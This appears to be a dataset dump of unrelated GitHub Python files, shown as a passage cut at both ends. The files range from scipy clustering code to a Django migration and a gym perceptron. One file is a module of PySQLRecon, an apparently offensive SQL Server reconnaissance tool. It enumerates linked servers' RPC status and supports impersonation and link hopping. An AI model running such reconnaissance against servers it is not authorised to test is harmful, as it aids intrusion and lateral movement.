logging.Formatter(\n \"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\"\n )\n if logger is None:\n logger = logging.getLogger()\n\n filehandler = logging.FileHandler(filename=job.fn(\"run.log\"))\n filehandler.setFormatter(formatter)\n logger.addHandler(filehandler)\n try:\n yield\n finally:\n logger.removeHandler(filehandler)\n\n\n@contextmanager\ndef add_path_to_environment_pythonpath(path):\n \"Temporarily insert the current working directory into the environment PYTHONPATH variable.\"\n path = os.path.realpath(path)\n pythonpath = os.environ.get(\"PYTHONPATH\")\n if pythonpath:\n for path_ in pythonpath:\n if os.path.isabs(path_) and os.path.realpath(path_) == path:\n yield # Path is already in PYTHONPATH, nothing to do here.\n return\n try:\n # Append the current working directory to the PYTHONPATH.\n tmp_path = [path] + pythonpath.split(\":\")\n os.environ[\"PYTHONPATH\"] = \":\".join(tmp_path)\n yield\n finally:\n os.environ[\"PYTHONPATH\"] = pythonpath\n pass\n else:\n try:\n # The PYTHONPATH was previously not set, set to current working directory.\n os.environ[\"PYTHONPATH\"] = path\n yield\n finally:\n del os.environ[\"PYTHONPATH\"]\n\n\n@contextmanager\ndef add_cwd_to_environment_pythonpath():\n with add_path_to_environment_pythonpath(os.getcwd()):\n yield\n\n\n@contextmanager\ndef switch_to_directory(root=None):\n \"Temporarily switch into the given root directory (if not None).\"\n if root is None:\n yield\n else:\n cwd = os.getcwd()\n try:\n os.chdir(root)\n yield\n finally:\n os.chdir(cwd)\n\n\nclass TrackGetItemDict(dict):\n \"A dict that keeps track of which keys were accessed via __getitem__.\"\n\n def __init__(self, *args, **kwargs):\n self._keys_used = set()\n super().__init__(*args, **kwargs)\n\n def __getitem__(self, key):\n self._keys_used.add(key)\n return super().__getitem__(key)\n\n def get(self, key, default=None):\n self._keys_used.add(key)\n return super().get(key, default)\n\n @property\n def keys_used(self):\n \"Return all keys that have been accessed.\"\n return self._keys_used.copy()\n\n\ndef roundrobin(*iterables):\n # From: https://docs.python.org/3/library/itertools.html#itertools-recipes\n # roundrobin('ABC', 'D', 'EF') --> A D E B F C\n # Recipe credited to George Sakkis\n num_active = len(iterables)\n nexts = cycle(iter(it).__next__ for it in iterables)\n while num_active:\n try:\n for next in nexts:\n yield next()\n except StopIteration:\n # Remove the iterator we just exhausted from the cycle.\n num_active -= 1\n nexts = cycle(islice(nexts, num_active))\n\n\nclass _hashable_dict(dict):\n def __hash__(self):\n return hash(tuple(sorted(self.items())))\n\n\ndef to_hashable(obj):\n # if isinstance(l, Sequence):\n if type(obj) == list:\n return tuple(to_hashable(_) for _ in obj)\n elif type(obj) == dict:\n return _hashable_dict(obj)\n else:\n return obj\n","repo_name":"shandave/signac-flow","sub_path":"flow/util/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"15582135796","text":"import gym\nimport numpy as np\n\n# Setting seed\nnp.random.seed(42)\n\n\nclass Network:\n \"\"\"\n Self-made Neural network implementation of two-layer perceptron with Evolutionary update.\n Made specifically to work in Gym environment\n \"\"\"\n\n def __init__(self, env, n_hidden, p_variance=0.1):\n self.p_variance = p_variance\n self.env = env\n self.n_hidden = n_hidden\n\n self.n_inputs = env.observation_space.shape[0]\n self.n_outputs = env.action_space.shape[0] if isinstance(env.action_space, gym.spaces.box.Box) \\\n else env.action_space.n\n\n self._params = Network.gen_rand_params(self.n_inputs, self.n_outputs, n_hidden, p_variance)\n\n @staticmethod\n def gen_rand_params(n_inputs, n_outputs, n_hidden, p_variance):\n # Initializing params for two-layer perceptron\n w1 = np.random.randn(n_hidden, n_inputs) * p_variance # first connection layer\n w2 = np.random.randn(n_outputs, n_hidden) * p_variance # second connection layer\n b1 = np.zeros(shape=(n_hidden, 1)) # bias internal neurons\n b2 = np.zeros(shape=(n_outputs, 1)) # bias motor neurons\n\n return [(w1, b1), (w2, b2)]\n\n def propagate(self, obs):\n obs.resize(self.n_inputs, 1)\n\n # Propagating through network\n (w1, b1), (w2, b2) = self._params\n z1 = np.dot(w1, obs) + b1\n a1 = np.tanh(z1)\n z2 = np.dot(w2, a1) + b2\n a2 = np.tanh(z2)\n\n # Selecting action\n if isinstance(self.env.action_space, gym.spaces.box.Box):\n action = a2\n else:\n action = np.argmax(a2)\n return action\n\n def evaluate(self, n_episodes, render=False):\n fitness = 0.0\n for e in range(n_episodes):\n observation = self.env.reset()\n done = False\n while not done:\n action = self.propagate(observation)\n observation, reward, done, info = self.env.step(action)\n fitness += reward\n if render:\n self.env.render()\n return fitness/n_episodes\n\n def get_params(self):\n return self._params\n\n def set_params(self, params):\n self._params = params\n\n\nif \"__main__\" in __name__:\n env = gym.make('CartPole-v0')\n network = Network(env, 5)\n n_episodes = 10\n\n fitness_av = network.evaluate(n_episodes)\n print(f\"Fitness average: {fitness_av}\")\n\n env.close()\n","repo_name":"quarriedstone/BehavioralRobotics2021","sub_path":"Lab2/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10620051625","text":"#!/usr/bin/python\n\nimport unittest\nimport sys\nsys.path.insert(0, '../src')\n\nfrom Abilities import Ability\n\n\nclass AbilityTest(unittest.TestCase):\n def setUp(self):\n self.sut = Ability()\n\n def test_name(self):\n test_name = 'None'\n self.assertEqual(test_name, self.sut.name)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jaycarson/fun","sub_path":"app/tst/AbilityTests.py","file_name":"AbilityTests.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31110892484","text":"#https://leetcode.com/problems/roman-to-integer/submissions/\n\"\"\"\nTime Complexity: O(n)\n\nStart loop from the last index if the current element is smaller than the\nsucceeding element subtract it from the finValue else add it to the finvalue\n\"\"\"\ndef romanToInt(s):\n vals = {'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000}\n finVal = vals[s[-1]]\n for i in range(len(s)-2,-1,-1):\n if vals[s[i]]>=vals[s[i+1]]:\n finVal+=vals[s[i]]\n else:\n finVal-=vals[s[i]]\n return finVal","repo_name":"sparsh-m/30days","sub_path":"d15_3.py","file_name":"d15_3.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4347576874","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication\nimport sys\nimport dev\n\nclass ExampleApp(QtWidgets.QMainWindow, dev.Ui_Dialog):\n def __init__(self, parent=None):\n super(ExampleApp, self).__init__(parent)\n self.setupUi(self)\n\ndef main():\n app = QApplication(sys.argv)\n form = ExampleApp()\n form.showFullScreen()\n app.exec_()\n\nif __name__ == '__main__':\n main()","repo_name":"Red-Hide/ZeroP_Software","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5952274651","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('anagrafiche', '0125_fatturacliente_da_confermare'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='bollacliente',\n name='oggetto',\n field=models.CharField(blank=True, null=True, max_length=150),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fatturacliente',\n name='oggetto',\n field=models.CharField(blank=True, null=True, max_length=150),\n preserve_default=True,\n ),\n ]\n","repo_name":"ghiblin/wms2","sub_path":"anagrafiche/migrations/0126_auto_20151007_1438.py","file_name":"0126_auto_20151007_1438.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9514969827","text":"\"\"\" Create indexes for the on-disk media files \"\"\"\nimport datetime\nimport html\nimport logging\nfrom os import listdir, path\n\nfrom jinja2 import Environment, FileSystemLoader\n\nclass Indexer():\n def __init__(self):\n self.env = env = Environment(\n loader=FileSystemLoader(searchpath=\"html/\" )\n )\n\n def generate_local_index(self, base_path):\n mms = self._get_local_files(base_path)\n\n template = self.env.get_template(\"local-index.html\")\n index_path = path.join(base_path, \"index.html\")\n self._write_file(\n template.render(\n time = mms['time'],\n images = mms['images'],\n texts = mms['texts'],\n all_files = mms['all_files']\n ),\n index_path\n )\n\n def generate_global_index(self, base_path, filename = \"mms.html\"):\n all_mms = []\n\n for f in listdir(base_path):\n local_path = path.join(base_path, f)\n if not path.isdir(local_path):\n continue\n\n mms = self._get_local_files(\n local_path,\n prepend_path = f\n )\n\n if not len(mms['all_files']):\n continue\n\n all_mms.append(mms)\n\n all_mms = sorted(all_mms, key = lambda mms: mms['time'], reverse = True)\n\n template = self.env.get_template(\"global-index.html\")\n index_path = path.join(base_path, filename)\n self._write_file(\n template.render(\n all_mms = all_mms\n ),\n index_path\n )\n\n def reindex_all(self, base_path):\n for f in listdir(base_path):\n full_path = path.join(base_path, f)\n if path.isdir(full_path):\n self.generate_local_index(full_path)\n\n self.generate_global_index(base_path)\n\n def _get_local_files(self, local_path, prepend_path = None):\n images = []\n texts = []\n all_files = []\n time = None\n\n for f in listdir(local_path):\n full_path = path.join(local_path, f)\n if not path.isfile(full_path):\n continue\n\n if f == 'index.html':\n continue\n\n if not time:\n time = datetime.datetime.fromtimestamp(\n path.getmtime(full_path)\n ).strftime('%Y-%m-%d %H:%M:%S')\n\n file_info = {\n 'name': f,\n 'relpath': path.join(prepend_path, f) if prepend_path else f\n }\n\n all_files.append(file_info)\n\n ext = path.splitext(f)[1].lower()\n if ext in ['.jpg', '.jpeg', '.png', '.gif']:\n images.append(file_info)\n elif ext in ['.txt']:\n try:\n with open(full_path, 'r') as f:\n data = html.escape(f.read())\n texts.append(\n \"
\".join(data.splitlines())\n )\n except OSError:\n logging.exception(\"Failed to read file %s\" % full_path)\n\n return {\n 'relpath': prepend_path,\n 'time': time,\n 'images': images,\n 'texts': texts,\n 'all_files': all_files\n }\n\n def _write_file(self, data, path):\n with open(path, 'w') as f:\n f.write(data)\n","repo_name":"gylle/sms900","sub_path":"sms900/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41953930064","text":"import typer\n\nfrom pysqlrecon.logger import logger\nfrom pysqlrecon.lib import PySqlRecon\n\napp = typer.Typer()\nCOMMAND_NAME = \"checkrpc\"\nHELP = \"[bright_black][NORM][/] Enumerate RPC status of linked servers [I,L]\"\nLINK_COMPATIBLE = True\nIMPERSONATE_COMPATIBLE = True\n\n\n@app.callback(invoke_without_command=True)\ndef main(ctx: typer.Context):\n \n pysqlrecon: PySqlRecon = ctx.obj['pysqlrecon']\n use_basic_tables = ctx.obj['basic_tables']\n\n # verify opts are compatible with module before connecting\n if not PySqlRecon.validate_opts(\n LINK_COMPATIBLE,\n IMPERSONATE_COMPATIBLE,\n pysqlrecon.link,\n pysqlrecon.impersonate\n ):\n exit()\n\n pysqlrecon.connect()\n\n if pysqlrecon.link is not None:\n logger.info(f\"Enumerating RPC status of linked servers on {pysqlrecon.link} via {pysqlrecon.target}\")\n else:\n logger.info(f\"Enumerating RPC status of linked servers on {pysqlrecon.target}\")\n\n query = \"SELECT name, is_rpc_out_enabled FROM sys.servers\"\n pysqlrecon.query_handler(query)\n pysqlrecon.print_results(use_basic_tables)\n\n pysqlrecon.disconnect()\n","repo_name":"Tw1sm/PySQLRecon","sub_path":"pysqlrecon/modules/checkrpc.py","file_name":"checkrpc.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"57"} +{"seq_id":"30413025748","text":"class TreeNode(object):\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution(object):\n def maxProduct(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n MODULA = 10 ** 9 + 7\n\n self.totals = list()\n def getSum(node):\n total = node.val\n\n if node.left:\n total += getSum(node.left)\n\n if node.right:\n total += getSum(node.right)\n\n self.totals.append(total)\n return total\n\n sumi = getSum(root)\n\n ans = 0\n for total in self.totals:\n ans = max(ans, total * (sumi - total))\n return ans % MODULA\n\n\n\"\"\"\nnode = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode4 = TreeNode(4)\nnode5 = TreeNode(5)\nnode6 = TreeNode(6)\n\nnode.left = node2\nnode.right = node3\nnode2.left = node4\nnode2.right = node5\nnode3.left = node6\n\"\"\"\n\nnode = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode4 = TreeNode(4)\nnode5 = TreeNode(5)\nnode6 = TreeNode(6)\n\nnode.right = node2\nnode2.left = node3\nnode2.right = node4\nnode4.left = node5\nnode4.right = node6\n\nsolution = Solution()\nprint(solution.maxProduct(node))\n","repo_name":"David-Tong/leetcode-in-python","sub_path":"1339-maximum product of splitted binary tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"38870896791","text":"import warnings\nimport bisect\nfrom collections import deque\n\nimport numpy as np\nfrom . import _hierarchy, _optimal_leaf_ordering\nimport scipy.spatial.distance as distance\nfrom scipy._lib._array_api import array_namespace, as_xparray, copy\nfrom scipy._lib._disjoint_set import DisjointSet\n\n\n_LINKAGE_METHODS = {'single': 0, 'complete': 1, 'average': 2, 'centroid': 3,\n 'median': 4, 'ward': 5, 'weighted': 6}\n_EUCLIDEAN_METHODS = ('centroid', 'median', 'ward')\n\n__all__ = ['ClusterNode', 'DisjointSet', 'average', 'centroid', 'complete',\n 'cophenet', 'correspond', 'cut_tree', 'dendrogram', 'fcluster',\n 'fclusterdata', 'from_mlab_linkage', 'inconsistent',\n 'is_isomorphic', 'is_monotonic', 'is_valid_im', 'is_valid_linkage',\n 'leaders', 'leaves_list', 'linkage', 'maxRstat', 'maxdists',\n 'maxinconsts', 'median', 'num_obs_linkage', 'optimal_leaf_ordering',\n 'set_link_color_palette', 'single', 'to_mlab_linkage', 'to_tree',\n 'ward', 'weighted']\n\n\nclass ClusterWarning(UserWarning):\n pass\n\n\ndef _warning(s):\n warnings.warn('scipy.cluster: %s' % s, ClusterWarning, stacklevel=3)\n\n\ndef int_floor(arr, xp):\n # numpy.array_api is strict about not allowing `int()` on a float array.\n # That's typically not needed, here it is - so explicitly convert\n return int(xp.astype(arr, xp.int64))\n\n\ndef single(y):\n \"\"\"\n Perform single/min/nearest linkage on the condensed distance matrix ``y``.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n The linkage matrix.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import single, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = single(y)\n >>> Z\n array([[ 0., 1., 1., 2.],\n [ 2., 12., 1., 3.],\n [ 3., 4., 1., 2.],\n [ 5., 14., 1., 3.],\n [ 6., 7., 1., 2.],\n [ 8., 16., 1., 3.],\n [ 9., 10., 1., 2.],\n [11., 18., 1., 3.],\n [13., 15., 2., 6.],\n [17., 20., 2., 9.],\n [19., 21., 2., 12.]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 10, 11, 12, 4, 5, 6, 1, 2, 3], dtype=int32)\n >>> fcluster(Z, 1, criterion='distance')\n array([3, 3, 3, 4, 4, 4, 2, 2, 2, 1, 1, 1], dtype=int32)\n >>> fcluster(Z, 2, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n \"\"\"\n return linkage(y, method='single', metric='euclidean')\n\n\ndef complete(y):\n \"\"\"\n Perform complete/max/farthest point linkage on a condensed distance matrix.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. See\n the `linkage` function documentation for more information\n on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import complete, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = complete(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.41421356, 3. ],\n [ 5. , 13. , 1.41421356, 3. ],\n [ 8. , 14. , 1.41421356, 3. ],\n [11. , 15. , 1.41421356, 3. ],\n [16. , 17. , 4.12310563, 6. ],\n [18. , 19. , 4.12310563, 6. ],\n [20. , 21. , 5.65685425, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n >>> fcluster(Z, 1.5, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n >>> fcluster(Z, 4.5, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 6, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n \"\"\"\n return linkage(y, method='complete', metric='euclidean')\n\n\ndef average(y):\n \"\"\"\n Perform average/UPGMA linkage on a condensed distance matrix.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. See\n `linkage` for more information on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import average, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = average(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.20710678, 3. ],\n [ 5. , 13. , 1.20710678, 3. ],\n [ 8. , 14. , 1.20710678, 3. ],\n [11. , 15. , 1.20710678, 3. ],\n [16. , 17. , 3.39675184, 6. ],\n [18. , 19. , 3.39675184, 6. ],\n [20. , 21. , 4.09206523, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n >>> fcluster(Z, 1.5, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 6, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='average', metric='euclidean')\n\n\ndef weighted(y):\n \"\"\"\n Perform weighted/WPGMA linkage on the condensed distance matrix.\n\n See `linkage` for more information on the return\n structure and algorithm.\n\n Parameters\n ----------\n y : ndarray\n The upper triangular of the distance matrix. The result of\n ``pdist`` is returned in this form.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. See\n `linkage` for more information on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import weighted, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = weighted(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 11. , 1. , 2. ],\n [ 2. , 12. , 1.20710678, 3. ],\n [ 8. , 13. , 1.20710678, 3. ],\n [ 5. , 14. , 1.20710678, 3. ],\n [10. , 15. , 1.20710678, 3. ],\n [18. , 19. , 3.05595762, 6. ],\n [16. , 17. , 3.32379407, 6. ],\n [20. , 21. , 4.06357713, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 1, 2, 3, 10, 11, 12, 4, 6, 5], dtype=int32)\n >>> fcluster(Z, 1.5, criterion='distance')\n array([3, 3, 3, 1, 1, 1, 4, 4, 4, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([2, 2, 2, 1, 1, 1, 2, 2, 2, 1, 1, 1], dtype=int32)\n >>> fcluster(Z, 6, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='weighted', metric='euclidean')\n\n\ndef centroid(y):\n \"\"\"\n Perform centroid/UPGMC linkage.\n\n See `linkage` for more information on the input matrix,\n return structure, and algorithm.\n\n The following are common calling conventions:\n\n 1. ``Z = centroid(y)``\n\n Performs centroid/UPGMC linkage on the condensed distance\n matrix ``y``.\n\n 2. ``Z = centroid(X)``\n\n Performs centroid/UPGMC linkage on the observation matrix ``X``\n using Euclidean distance as the distance metric.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed\n distance matrix is a flat array containing the upper\n triangular of the distance matrix. This is the form that\n ``pdist`` returns. Alternatively, a collection of\n m observation vectors in n dimensions may be passed as\n an m by n array.\n\n Returns\n -------\n Z : ndarray\n A linkage matrix containing the hierarchical clustering. See\n the `linkage` function documentation for more information\n on its structure.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import centroid, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = centroid(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3.33333333, 6. ],\n [16. , 17. , 3.33333333, 6. ],\n [20. , 21. , 3.33333333, 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 10, 11, 12, 1, 2, 3, 4, 5, 6], dtype=int32)\n >>> fcluster(Z, 1.1, criterion='distance')\n array([5, 5, 6, 7, 7, 8, 1, 1, 2, 3, 3, 4], dtype=int32)\n >>> fcluster(Z, 2, criterion='distance')\n array([3, 3, 3, 4, 4, 4, 1, 1, 1, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n Also, `scipy.cluster.hierarchy.dendrogram` can be used to generate a\n plot of the dendrogram.\n\n \"\"\"\n return linkage(y, method='centroid', metric='euclidean')\n\n\ndef median(y):\n \"\"\"\n Perform median/WPGMC linkage.\n\n See `linkage` for more information on the return structure\n and algorithm.\n\n The following are common calling conventions:\n\n 1. ``Z = median(y)``\n\n Performs median/WPGMC linkage on the condensed distance matrix\n ``y``. See ``linkage`` for more information on the return\n structure and algorithm.\n\n 2. ``Z = median(X)``\n\n Performs median/WPGMC linkage on the observation matrix ``X``\n using Euclidean distance as the distance metric. See `linkage`\n for more information on the return structure and algorithm.\n\n Parameters\n ----------\n y : ndarray\n A condensed distance matrix. A condensed\n distance matrix is a flat array containing the upper\n triangular of the distance matrix. This is the form that\n ``pdist`` returns. Alternatively, a collection of\n m observation vectors in n dimensions may be passed as\n an m by n array.\n\n Returns\n -------\n Z : ndarray\n The hierarchical clustering encoded as a linkage matrix.\n\n See Also\n --------\n linkage : for advanced creation of hierarchical clusterings.\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, fcluster\n >>> from scipy.spatial.distance import pdist\n\n First, we need a toy dataset to play with::\n\n x x x x\n x x\n\n x x\n x x x x\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n Then, we get a condensed distance matrix from this dataset:\n\n >>> y = pdist(X)\n\n Finally, we can perform the clustering:\n\n >>> Z = median(y)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n\n The linkage matrix ``Z`` represents a dendrogram - see\n `scipy.cluster.hierarchy.linkage` for a detailed explanation of its\n contents.\n\n We can use `scipy.cluster.hierarchy.fcluster` to see to which cluster\n each initial point would belong given a distance threshold:\n\n >>> fcluster(Z, 0.9, criterion='distance')\n array([ 7, 8, 9, 10, 11, 12, 1, 2, 3, 4, 5, 6], dtype=int32)\n >>> fcluster(Z, 1.1, criterion='distance')\n array([5, 5, 6, 7, 7, 8, 1, 1, 2, 3, 3, 4], dtype=int32)\n >>> fcluster(Z, 2, criterion='distance')\n array([3, 3, 3, 4, 4, 4, 1, 1, 1, 2, 2, 2], dtype=int32)\n >>> fcluster(Z, 4, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 